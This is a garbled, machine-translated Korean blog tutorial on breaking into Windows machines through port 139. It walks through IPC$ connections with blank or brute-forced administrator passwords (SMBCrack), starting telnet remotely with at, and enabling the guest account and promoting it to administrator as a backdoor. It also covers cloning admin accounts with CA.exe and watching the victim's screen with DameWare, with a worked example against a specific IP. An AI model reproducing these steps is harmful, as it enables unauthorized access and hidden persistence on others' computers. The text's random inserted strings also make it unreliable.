해킹 사이트는 어떤 책을 읽어야 하나요?

2006-11-12 08: 42: 34/날씨: 맑음/기분: 행복.

내 로그

해킹 기술을 막 배운 친구들에게는 손을 댈 수 없다고 느끼는 경우가 많다. 온라인 자습서는 하늘을 날고 있지만 실용적이고 초보자에게 가까운 것은 많지 않다. 이제 포트 139 를 통한 침입에 대해 이야기하겠습니다. 많은 관련 지식에 익숙하지 않을 수도 있다는 점을 감안할 때, 제 문장 부분은 두 부분으로 나뉩니다. 첫 번째 부분은 관련 지식의 소개이고, 두 번째 부분은 예를 통해 침입 과정과 다양한 명령의 사용에 대해 자세히 설명합니다. 자, 가자.

5e @ pf9 ~)I0 & lt；; 첫 번째 부분: 지식 소개 > 판박수 M t8pM+bnX, _

(1) 포트란 무엇입니까?

나; ESN#v)Mf0 포트는 다양한 프로그램이 연 데이터 수신 및 전송을 위한 "창" 입니다. 프로그램은 외부 세계와 소통하기 위해 그것이 필요하다. 여러분은 그것을 사서함으로 생각할 수 있습니다. 만약 내가 너에게 메세지를 보내고 싶다면, 나는 그것을 너의 우편함에 넣을 것이다. 뉴스를 얻으려면 우편함을 열어서 꺼내기만 하면 됩니다. 마찬가지로, 다른 컴퓨터들은 당신의 기계와 통신하기 위해 데이터를 당신의 컴퓨터의 포트로 보내고, 컴퓨터는 포트를 읽어서 데이터를 얻을 수 있다. (알버트 아인슈타인, 컴퓨터명언)

포트 0qn$jxW8R'h0 (2) 이 고유합니까?

D h S F~p 1j Q+Z0K0 포트는 고유하지 않습니다. 포트는 TCP 포트와 UDP 포트 두 가지로 나뉘어 각각 최대 65535 개로 자연수 1 ~ 65535 로 번호가 매겨져 있습니다. 여기서는 TCP 포트와 UDP 포트의 차이점을 설명하지 않습니다. 서로 다른 포트가 서로 다른 프로그램에 해당한다는 것을 알기만 하면 됩니다. 각 프로그램은 자신의 포트로 전송된 데이터만 읽을 수 있습니다. 예를 들어 hi.exe 는 TCP6500 포트를 엽니다. TCP650 1 포트 또는 UDP6500 포트로 데이터를 보내면 hi.exe 에서 데이터를 수신할 수 없습니다. Hi.exe 는 TCP6500 포트로 전송된 데이터만 수신할 수 있습니다. 범박수 T @ # GN 1P 1BS]

(3)TCP 139 포트 기능.

\+g6k@"]0 TCP 139 는 네트워크 공유를 위한 포트입니다. 컴퓨터가 TCP 139 포트를 열어야 다른 컴퓨터가 해당 * * * 공유 파일에 액세스할 수 있습니다. 하지만 Windows 2000/ NT/ XP 에서는 TCP 139 포트도 중요한 역할을 합니다. 원격 관리 연결 (IPC$, Admin$) 은 Microsoft 가 관리자가 원격 컴퓨터를 쉽게 관리할 수 있도록 특별히 설치한 것입니다 IPC$ (원격 관리) 연결을 성공적으로 설정하려면 관리자의 사용자 이름과 암호가 필요합니다. 이는 포트 139 기반 침입의 초점이기도 합니다. 원격 컴퓨터의 비밀번호를 받고 139 포트를 통해 IPC$ 에 연결하면 원격 PC 를 완벽하게 제어할 수 있습니다.

NSlC)x_}y0 (4) 필수 명령에 대한 자세한 설명 및 관련 툴 사용

St q'l(@SrC0b0) 은 먼저 해커의 길에서 성장하기 위해 Win98 을 뜯어내고 Windows2000 을 설치하라고 설명해야 한다. 제가 아래에 쓴 대부분의 명령과 도구는 Windows2000/ NT/ XP 에만 적용됩니다.

P @7i~]4W0 클릭 시작 → 실행, cmd.exe 입력, 명령줄 창 팝업. 침략 기간 동안 작업의 95% 가 여기서 이루어지기 때문에 당신은 분명히 그것에 대해 잘 알고 있을 것이다. (토마스 A. 에디슨, 일명언) 이제 dir, CD, del, copy, net, at 등 139 의 성공적인 침입에 필요한 몇 가지 명령을 소개하겠습니다.

4p"g, r@duS5|0 dir 지정된 경로에 디렉토리와 파일을 나열하려면 c: \ > 를 입력합니다 Dir c:\ 는 드라이브 c 아래에 있는 모든 디렉토리와 파일을 나열하고, Dir c:\winnt\ 는 드라이브 c 아래에 있는 winnt 폴더 아래에 디렉토리와 파일을 나열하며, dir 은 서로 다른 화면에 표시할 수 있는 세 개의 공통 매개변수 /p, /a, /s, /p 를 가지고 있습니다 일반적으로 한 디렉토리에 많은 파일이 있어 한 화면을 표시할 수 없으므로 DIR C: \ /p P./A 와 같은/P 를 사용하여 숨겨진 파일과 디렉토리를 표시합니다. Windows 에서 파일 속성을 hidden 으로 설정한 다음 (파일이 c:\a.txt 라고 가정) 명령줄에 dir c:\a.txt 를 입력하면 파일을 찾을 수 없다는 메시지가 표시되지만 (file not fount) did 를 입력합니다 예를 들어, 상대방의 홈 페이지 파일 index.asp 를 삭제하려 하는데 이 파일의 위치를 모르기 때문에 DIR index.asp/S 를 사용하여 각 파티션에서 검색할 수 있습니다.

C ['_} 9UA 0 CD 는 CD c:\winnt\system32 가 system32 디렉토리에 있는 디렉토리로 들어가는 데 사용됩니다. Dir 과 dir c:\winnt\system32 를 사용할 수 있다고 믿지 마라. 결과는 똑같다. 파티션을 전환하려는 경우 c: \ > D: D 디스크 바로 아래에 있습니다. CD d: 가 아닙니다. 이것은 주의해야 합니다. 범박수/@ kb/HL; T? 5Q

Del 은 파일을 삭제하는 데 사용됩니다. A.txt 를 삭제합니다 .....

을 눌러 섹션을 인쇄할 수도 있습니다 } d | 0u3W0copy 파일을 복사하는 데 사용됩니다. 이 명령은 매우 중요하기 때문에 너는 반드시 그것을 숙달해야 한다. C:\a.txt d:\mp3\b.txt 복사 CD 아래의 a.txt 를 d 디스크 아래의 MP3 디렉토리로 복사하고 이름을 b.txt 로 바꿉니다. 복사된 파일 유형은 원하는 대로 c:\a.exe 를 복사할 수 있습니다 물론 a.exe 는 제대로 작동하지 않습니다. 반 버슈! R` z Bz 1IVS Fx

Net 명령은 139 포트 침입의 가장 중요한 부분이며 전체 침입 과정에서 여러 번 사용됩니다. 명령행 창에 net 을 입력하면 많은 매개변수를 볼 수 있습니다. 이렇게 많은 매개 변수에 놀라지 마세요. 이제 하나씩 설명해 드리겠습니다.

S C+Ay5? Y.}y0 순 사용

"qFqi ve0net use" 명령은 원격 호스트에 IPC$ (관리) 연결을 설정하는 데 사용됩니다. 원격 컴퓨터의 사용자 이름 (일반적으로 관리자, 기억) 과 암호가 있으면 명령줄 창에 netuse \ \ IP \ IPC $ "password"/user: administrator 를 입력합니다 그 후에 관리 할 수 ​​있습니다. Net 사용은 원격 시스템의 * * * 공유 리소스를 매핑하는 데도 유용합니다. Net use z: \\IP\C$ (참고! 이후의 모든 명령은 첫 번째 명령을 기반으로 합니다. 즉, IPC$ 연결을 설정해야 명령이 성공할 수 있습니다. ) "내 컴퓨터" 를 켜면 Z 디스크가 하나 더 있고, 원격 호스트 CD 아래에는 모든 것이 있습니다. Z 드라이브의 파일을 삭제하면 다른 CD 아래의 파일도 삭제됩니다. Z 드라이브의 모든 작업은 실제로 원격 컴퓨터 CD 의 작업입니다. 어때요? 재미있지 않나요? 보숙 /) o! L6{2z

넷스케이프 애호가 Boshu /v-o? 하루가 좋다

Net view 는 원격 컴퓨터에 있는 * * * 리소스를 확인하는 데 사용됩니다. 보통 내 문서와 같은 * * * 공유 폴더를 볼 수 있습니다. net view \\IP 만 입력하면 됩니다. 나는 개인적으로 그물망이 그다지 유용하지 않다고 생각한다. Windows2000 에서는 모든 하드 드라이브가 * * * 이지만 net view 로 보면 c, d, e, d, e 등 * * * 리소스가 없다는 것을 알 수 있습니다. 왜 그럴까요? 이전 명령 중 일부에서는 IPC$, C$ 및 C$ 와 같은 이상한 것을 입력했습니다. 실제로 Windows2000 에서는 접미사 "$" 가 붙은 * * * 리소스가 숨겨져 명령줄 창에 표시되지 않습니다. Windows2000 에서는 모든 디스크가 C $,D $,E $ 등의 이름으로 공유됩니다. 매니아 Boshu J+NAy? SF & ampt9F#Q

순몫

*Y, \ IP"h? 을 눌러 섹션을 인쇄할 수도 있습니다 I8l~ H0net 점유율은 * * * 을 여는 데 사용됩니다. Net share QQ=c:\tencent 를 입력하면 QQ 라는 추가 * * * 즐거움 리소스를 찾을 수 있습니다. 이 명령의 효과는 무엇입니까? 한 호스트가 보안 작업을 하고 IPC$, C$, D$ 등 * * * 을 끄면 139 포트에 관리 연결을 설정할 수 없고 상대방의 CD 에 액세스할 수 없습니다. 우리가 다른 방법 (예: 원격 오버플로우) 을 통해 들어갈 때, net share 를 사용하여 IPC$ 를 열어 익숙한 139 포트 침입이 될 수 있습니다. 이에 따라 * * * 즐거움을 끄려면 접미사 /del 을 붙일 수 있습니다. 예를 들어 net share c$ /del 은 CD 의 * * * 즐거움을 끕니다. 반 버슈 %b`rn0ja

네티즌 매니아 Boshu "q"R7p Qy"EO

Net user 명령은 호스트의 사용자를 관리하는 데 사용됩니다. 매개 변수 없이 net user 를 입력하면 컴퓨터의 모든 사용자 이름이 나열됩니다. 이제 net user 명령이 사용자를 어떻게 조작하는지 살펴보겠습니다. 애호가 boshu 8y1D. Ur}kUs X

┈----------------------

6 yyi # czo 0 ★ 네트워크 사용자 hacker 12345/Add 비밀번호 12345 로 hacker 라는 사용자를 만듭니다. ⓙ

4 lfnkbuv * v0 ★ 네트워크 사용자 hacker /del 은 hacker 라는 사용자를 삭제합니다. ★ 연인 보슈 9iy% u1fi9q; Ypb'E

★ 네트워크 사용자 해커/활동: 아니오 사용자 해커를 비활성화하지 않으면 더 이상 이 컴퓨터에 로그인할 수 없습니다. ⓫ 애호가 Boshu 1C0q@ w[, zq*qR]

★ 네트워크 사용자 해커/활동: 비활성화된 해커를 활성화하는 것입니다. ★ 반 버슈; O # \ 4d # c；; H, g

★ 네트워크 로컬 그룹 관리자 해커/추가 사용자 해커를 관리자 그룹에 추가합니다. 즉, 해커의 권한을 강화하여 관리자로 만듭니다.

L5B 입니다. Xzk ~ "r% qo0 ☆--------------

3\|; H aU, ]0 네트워크 시작/네트워크 중지

IC! Ok n0net start/net stop 명령은 시스템 서비스를 시작/중지하는 데 사용됩니다. 일반적으로 net stop w3svc 를 사용하고 웹 페이지를 교체합니다. 이 명령은 더 이상 말하지 않겠습니다. 알면 됩니다. 매니아 Boshu "`k, H5au 의 O; U

* 명령 시 순 시간

"g|? \ f；; VJ0 은 at 명령에 net time 명령의 결과가 필요하기 때문에 이들을 하나로 묶습니다. 일반적으로 먼저 net view \\ip 에서 원격 호스트 시간을 얻은 다음 (9:00 으로 가정) \\ip 9:00 telnet 에서 텔넷 서비스를 시작하여 원격으로 프로그램을 실행합니다.

(5) 준비해야 할 도구

P' zxey 5z' j0 육계 사냥꾼 v 1.0 네트워크 세그먼트를 스캔하여 컴퓨터 애호가 boshu V8 |+rmno 4 yyy fus 약한 비밀번호를 찾습니다.

SMBCrack 폭력은 특정 호스트의 비밀번호, 보숙, F] CRS+N 을 추측합니다.

DameWare 미니 원격 모니터링 작동 화면

~ f9bfy # I "o0 CA.exe 클론 관리자 계정.

& lt 2 부: 침입 예 >

, Kz/K? #Hbw/k0 오늘 성간 놀이를 하다가 고수에게 반복적으로 파괴되어, 좋은 ing…… ... 답답하다 ... 그래서 인터넷에서 몇 가지 활동을 했다. 육계 사냥꾼을 열고 시작 IP 와 끝 IP 에 스캔할 IP 끝을 채우고 시작을 클릭합니다. 잠시 후 육계 두 마리가 우리 앞에 나타났다 (그림 1). 이제 시작 → 실행 → cmd.exe 를 클릭하여 귀여운 명령줄 창을 열겠습니다. 입력: netuse \ \ 218.80.236.37 \ IPC $ ""/user: administrator, "명령이 성공적으로 완료되었습니다 하하, 이제 IPC$ (원격 관리 연결) 를 설정했습니다. 그러면 원격 호스트 시간을 얻을 수 있습니다. net time \\2 18.80.236.37. 현재 시간은 2003 년 5 월 22 일입니다. 그런 다음 at 명령을 사용하여 원격 호스트의 telent 서비스를 시작합니다. at \ \ 218.80.236.3710: 32 telent, 원격 호스트에 쉽게 로그인할 수 있습니다. (주의! IPC$ 연결을 설정하고 원격 호스트에 로그인하는 것은 완전히 다른 두 가지 개념입니다. IPC$ 는 at 명령을 사용하여 원격 서비스를 시작할 수 있도록 설정되었습니다. 거의 모든 명령은 원격 호스트에 로그인한 후에 사용됩니다. 그렇지 않으면 모두 자신의 컴퓨터 조작입니다. ) 그런 다음 telent 2 18.80.236.37 23 을 입력하면 그림 (그림 2) 과 같은 프롬프트 창이 나타나고 administrator enter 를 두 번 입력하면 명령 프롬프트가 나타납니다. 이제부터는 입력한 모든 명령이 원격 컴퓨터에서 실행됩니다. 먼저 net user 를 입력하여 어떤 사용자가 있는지 확인하십시오. 여기서는 관리자, 게스트, Guest _ kiki 등 세 명의 사용자만 찾았습니다. 사용자가 다음에 호스트에 들어갈 때 관리자의 비밀번호를 변경했을 수 있다는 점을 감안하면 성공적으로 다시 들어갈 수 있도록 작은 뒷문을 남겨 두어야 합니다. 일반적으로 net user guest/active:yes 를 입력하여 게스트 사용자를 활성화합니다. 게스트 사용자 시스템에 내장되어 있어 모든 컴퓨터에서 사용할 수 있으며 기본적으로 비활성화됩니다. Net 사용자 guest 12345 는 guest 의 비밀번호를 12345 로 변경하고 Net 로컬 그룹 관리자 guest/Add 는 guest 의 권한을 관리자 권한으로 승격시켜 다음 번에 원격 호스트를 완전히 제어할 수 있도록 합니다. 뒷문을 나서면, 너는 그의 컴퓨터를 잘 둘러보고, 재미있는 것이 있는지 알아보고, 방금 배운 것을 실천에 옮길 수 있다. 명령줄이 정말 불편하다고 생각하시면 저를 따라오시면 다채로운 그래픽 인터페이스로 안내해 드리겠습니다. 이제 죽어가는 창에 exit 를 입력하면' 원격 호스트 연결 끊기' 가 표시됩니다. 이 명령을 사용하여 원격 호스트를 떠나 자신의 컴퓨터로 돌아가서 다운로드한 DameWare 를 클릭하면 그림 3 과 같은 인터페이스가 나타납니다. 호스트 이름에 상대 IP 를 입력하고 사용자 이름 administrator 와 암호 (현재 비밀번호가 비어 있으므로 채워지지 않음) 를 입력한 다음 연결 을 클릭하고 DameWare 를 기다립니다. 잠시 후 그림 (그림 4) 과 같이 원격 호스트의 데스크톱을 보여 주는 창이 나타납니다. 너는 다른 사람의 일거수일투족을 볼 수 있고, 그의 마우스를 인수할 수도 있다. 재미있지 않나요? 하지만 우리가 기술을 배우러 온 것이지, 기술을 파괴하러 온 것이 아니라는 것을 기억하라. 그러니 나쁜 짓을 하지 마라. 반 버슈 "W e! Y8De

문장 여기서 끝내겠습니다. 사실, 침입의 예를 들어, 제가 특별히 언급하고 싶은 몇 가지가 있습니다.

#s3c#J7{6`DoD0 (1) 육계 사냥꾼은 비밀번호가 비어 있는 호스트만 검색할 수 있기 때문에 처음에는 연습만 할 수 있습니다. 일반적으로 공격 포트 139 가 필요합니다. 우리는 SMBCrack 이라는 소프트웨어를 사용하여 한 호스트의 비밀번호를 폭력적으로 추측하는 데 사용한다. 속도가 빠르다. 제 컴퓨터는 30 분 정도면 24 만 개의 비밀번호를 추측할 수 있고, 명령행 창에서 Smbcrack218.80.236.37 관리자 Words.txt1을 입력합니다. 2 18.80.236.37 여기는 당신이 공격할 IP 입니다. Words.txt 는 많은 비밀번호가 들어 있는 사전입니다. 너는 스스로 인터넷에 가서 확인할 수 있다. 좋은 사전은 침입의 성공률을 높일 수 있다. Boshu-B4 ejtb' a-s0dr $ a.

Telent 가 상대방의 기계에 들어간 후, 우리는 뒷문을 더욱 은폐하기 위해 CA.exe 를 자주 사용한다. CA 는 (클론 관리자) 의 약어입니다. 이름에서 알 수 있듯이 다른 사용자를 관리자로 복제할 수 있습니다. CA.exe \ \ 2 18. 80. 236. 37 관리자 암호 IUSR_VICTIM SetNewPass, iusr _ 비밀번호가 새 비밀번호로 설정됩니다. 복제가 완료되면 일반적으로 찾을 수 없기 때문에 은폐성이 높다. 보슈. D Yk$RrIC9?

(3)at 의 명령은 좀 웃긴다. 많은 사람들이 먼저 net view \\IP 로 시간을 보고 at 로 상대방의 프로그램을 시작하지만 자주 실패합니다. 이는 많은 사람들이 net view \\IP 로 얻은 시간을 at 에 직접 사용할 수 없다는 것을 모르기 때문에+12 문제가 발생하기 때문입니다. 상대를 보는 시간이 오후 3 시라면 AT \Boshu 8C, Q7Jr*M, 한 팬을 사용해야 한다.

글쎄, 그게 다야. 이 문장 다 보시면 139 포트를 성공적으로 침입할 수 있을 겁니다. 들어가서 무엇을 하느냐에 관해서는, 너는 스스로 할 수 있다.